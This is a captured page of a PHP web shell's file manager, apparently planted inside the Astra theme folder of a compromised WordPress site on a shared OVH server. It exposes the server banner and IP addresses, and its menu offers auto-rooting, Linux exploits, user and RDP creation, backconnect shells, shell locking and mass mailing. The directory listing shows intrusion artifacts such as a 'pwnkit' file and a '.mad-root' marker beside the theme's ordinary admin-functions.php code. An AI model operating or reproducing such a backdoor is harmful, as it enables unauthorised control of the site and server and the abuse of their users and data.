Linux webm003.cluster129.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.129.20.3 | : 216.73.217.101
Cant Read [ /etc/named.conf ]
8.4.22
chloega
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
chloega /
www /
wp-content /
themes /
astra /
inc /
[ HOME SHELL ]
Name
Size
Permission
Action
addons
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
blog
[ DIR ]
drwxr-xr-x
builder
[ DIR ]
drwxr-xr-x
compatibility
[ DIR ]
drwxr-xr-x
core
[ DIR ]
drwxr-xr-x
customizer
[ DIR ]
drwxr-xr-x
dynamic-css
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
metabox
[ DIR ]
drwxr-xr-x
modules
[ DIR ]
drwxr-xr-x
schema
[ DIR ]
drwxr-xr-x
theme-update
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
admin-functions.php
1.62
KB
-rw-r--r--
class-astra-after-setup-theme....
11.32
KB
-rw-r--r--
class-astra-dynamic-css.php
299.44
KB
-rw-r--r--
class-astra-extended-base-dyna...
6.43
KB
-rw-r--r--
class-astra-global-palette.php
13.41
KB
-rw-r--r--
class-astra-loop.php
7.2
KB
-rw-r--r--
class-astra-memory-limit-notic...
12.42
KB
-rw-r--r--
class-astra-mobile-header.php
5.78
KB
-rw-r--r--
extras.php
44.64
KB
-rw-r--r--
google-fonts.php
197.32
KB
-rw-r--r--
index.php
111
B
-rw-r--r--
markup-extras.php
72.26
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
template-parts.php
9.52
KB
-rw-r--r--
template-tags.php
1.11
KB
-rw-r--r--
w-org-version.php
647
B
-rw-r--r--
widgets.php
4.32
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : admin-functions.php
<?php /** * Admin functions - Functions that add some functionality to WordPress admin panel * * @package Astra * @since 1.0.0 */ if ( ! defined( 'ABSPATH' ) ) { exit; // Exit if accessed directly. } /** * Register menus */ if ( ! function_exists( 'astra_register_menu_locations' ) ) { /** * Register menus * * @since 1.0.0 */ function astra_register_menu_locations() { /** * Primary Menus */ register_nav_menus( array( 'primary' => esc_html__( 'Primary Menu', 'astra' ), ) ); if ( true === Astra_Builder_Helper::$is_header_footer_builder_active ) { /** * Register the Secondary & Mobile menus. */ register_nav_menus( array( 'secondary_menu' => esc_html__( 'Secondary Menu', 'astra' ), 'mobile_menu' => esc_html__( 'Off-Canvas Menu', 'astra' ), ) ); $component_limit = defined( 'ASTRA_EXT_VER' ) ? Astra_Builder_Helper::$component_limit : Astra_Builder_Helper::$num_of_header_menu; for ( $index = 3; $index <= $component_limit; $index++ ) { if ( ! is_customize_preview() && ! Astra_Builder_Helper::is_component_loaded( 'menu-' . $index ) ) { continue; } register_nav_menus( array( 'menu_' . $index => esc_html__( 'Menu ', 'astra' ) . $index, ) ); } /** * Register the Account menus. */ register_nav_menus( array( 'loggedin_account_menu' => esc_html__( 'Logged In Account Menu', 'astra' ), ) ); } /** * Footer Menus */ register_nav_menus( array( 'footer_menu' => esc_html__( 'Footer Menu', 'astra' ), ) ); } } add_action( 'init', 'astra_register_menu_locations' );
Close